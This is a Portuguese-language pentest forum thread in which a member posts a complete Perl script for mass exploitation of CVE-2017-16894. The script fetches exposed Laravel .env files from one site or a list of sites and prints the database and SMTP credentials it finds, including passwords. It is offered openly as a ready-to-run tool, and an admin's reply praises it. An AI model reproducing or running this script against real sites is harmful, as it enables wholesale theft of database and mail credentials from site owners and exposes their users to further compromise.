ENV Mass Exploit / LFD

Postagem de conteúdo sobre pentest
Post Reply
User avatar
v4p0r
Membro
Membro
Posts: 2
Joined: Sun Jul 02, 2017 10:03 pm

ENV Mass Exploit / LFD

Post by v4p0r » Sun Nov 26, 2017 7:58 pm

ENV Mass Exploit

Descrição:

Script criado para exploração em massa da mesma
[CVE - 2017-16894] - Laravel Enviroment Variables - Read passwords and login credentials

PoC: http://whiteboyz.xyz/laravel-env-file-vuln.html
CVE: https://cve.mitre.org/cgi-bin/cvename.c ... 2017-16894

Code: Select all

#!/usr/bin/perl
# [CVE - 2017-16894] - Laravel Enviroment Variables - Read passwords and login credentials
# CVE: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2017-16894
# POC: http://whiteboyz.xyz/laravel-env-file-vuln.html
# Coder by v4p0r 20 NOV 2017

use strict;
use warnings;
use Getopt::Long;
use WWW::Mechanize;

my $usr = $^O;
if ($usr eq "MSWin32") { 
	system ("cls"); 
} else { 
	system ("clear"); 
}

my ($helpzinho);
my $banner = @ARGV;

GetOptions(    'list-site|l=s'  => \$main::list,
			   'site|s=s'  => \$main::site,
			   'help|h'       => \$helpzinho,
			  );

if ($helpzinho) { 
	&banner;
}

print "================================\n" .
	  " #   Exploit: ENV EXPLOIT       \n" .
      " #   Coder: v4p0r               \n" .
	  " #   Date: 21 NOV 2017          \n" .
	  " #   CVE - 2017-16894           \n" .
      "================================\n";


if ($main::site) {
	
	 my $url = $main::site;
	 print $url;
	 my $env = request($url);
	 
	if ($env =~ /APP_ENV/){
		
		get_config($env);
	
		exit;
    } else {
		print "[NOT VULN]";
	}
	
	
}

if($banner <= 1){

	print " # Coder: v4p0r             \n" .
	" # Team: Yunkers Crew             \n" .
	" # Twitter: 0x777null             \n" .
	" # Skype: drx.priv\n" .
	"================================  \n".
	" # Usage: perl $0 --help\n".
	"================================  \n";
	
	exit;
}

open (my $web,'<',$main::list) || die "\n [Lista nao selecionada]";
my @sites = <$web>;

foreach my $url(@sites) {

	print "\n[SITE]: ".$url."";
	my $env = request($url);
	
    if ($env =~ /APP_ENV/){

		get_config($env);
	
    } else {
		print "[NOT VULN]";
	}
	

}

sub request {

	my $url = shift;
	$url = 'http://'.$url if $url !~/^https?:\/\//;
	
	my $req = WWW::Mechanize->new( agent => 'Mozilla 5.0' );
        $req->timeout(3);
        $req->max_size(1024000);
        $req->protocols_allowed( [ 'http', 'https'] );
		
	$req->get($url);
    	my $brabo = $req->content;
	return $brabo;

}

sub get_config {

	my $env = shift;

	print "\n[DATABASE CONFIG]\n\n";
	my @dbc = $env =~ /DB_CONNECTION=(.*)/;
	my @dbh = $env =~ /DB_HOST=(.*)/;
	my @dbp = $env =~ /DB_PORT=(.*)/;
	my @dbd = $env =~ /DB_DATABASE=(.*)/;
	my @dbu = $env =~ /DB_USERNAME=(.*)/;
	my @dbpwd = $env =~ /DB_PASSWORD=(.*)/;
	
	print "[DB_CONNECTION]: " . ($dbc[0] // 'Nothing') . "\n";
	print "[DB_HOST]: " . ($dbh[0] // 'Nothing') . "\n";
	print "[DB_PORT]: " . ($dbp[0] // 'Nothing') . "\n";
	print "[DB_DATABASE]: " . ($dbd[0] // 'Nothing') . "\n";
	print "[DB_USERNAME]: " . ($dbu[0] // 'Nothing') . "\n";
	print "[DB_PASSWORD]: " . ($dbpwd[0] // 'Nothing') . "\n";
	
	# GET SMTP CONFIG
	print "\n[SMTP CONFIG]\n\n";
	my @md = $env =~ /MAIL_DRIVER=(.*)/;
	my @mh = $env =~ /MAIL_HOST=(.*)/;
	my @mp = $env =~ /MAIL_PORT=(.*)/;
	my @mfn = $env =~ /MAIL_FROM_NAME=(.*)/;
	my @mfe = $env =~ /MAIL_FROM_EMAIL=(.*)/;
	my @mu = $env =~ /MAIL_USERNAME=(.*)/;
	my @mpwd = $env =~ /MAIL_PASSWORD=(.*)/;
	my @me = $env =~ /MAIL_ENCRYPTION=(.*)/;	
	
	print "[MAIL_DRIVER]: " . ($md[0] // 'Nothing') . "\n";
	print "[MAIL_HOST]: " . ($mh[0] // 'Nothing') . "\n";
	print "[MAIL_PORT]: " . ($mp[0] // 'Nothing') . "\n";
	print "[MAIL_FROM_NAME]: " . ($mfn[0] // 'Nothing') . "\n";
	print "[MAIL_FROM_EMAIL]: " . ($mfe[0] // 'Nothing') . "\n";
	print "[MAIL_USERNAME]: " . ($mu[0] // 'Nothing') . "\n";
	print "[MAIL_PASSWORD]: " . ($mpwd[0] // 'Nothing') . "\n";
	print "[MAIL_ENCRYPTION]: " . ($me[0] // 'Nothing') . "\n";
}

sub banner {
	print q{
 *        . . . . o o o o o
 *               _____      o      
 *      ____====  ]OO|_n_n__][.     
 *     [________]_|__|________)<    
 *      oo    oo  'oo OOOO-| oo\\_   
 *  +--+--+--+--+--+--+--+--+-$1-+--+--+--+--+
	
	};

	print "\n Usage: $0 <comando>\n\n".
		  " [+] Comandos:\n".
		  "   --help         [Ajuda com os comandos]\n".
		  "   --list-site|l  [Seleciona sua lista de sites]\n".
		  "   --site|s       [Unico alvo]\n".
		  " [!] Exemplos:\n".
		  "   perl $0 -l sites.txt\n".
		  "   perl $0 -s  http://localhost/.env\n";
    exit;

}

User avatar
Kodo no Kami
Admin
Admin
Posts: 683
Joined: Fri Jan 02, 2015 1:56 pm
Contact:

Re: ENV Mass Exploit / LFD

Post by Kodo no Kami » Sat Dec 16, 2017 6:47 pm

show mano \o
Image

Conheça o sistema e manipule ele, se limite ao sistema e seja manipulado por ele ~kodo no kami

meu perfil yahoo

Post Reply

Return to “Pentest”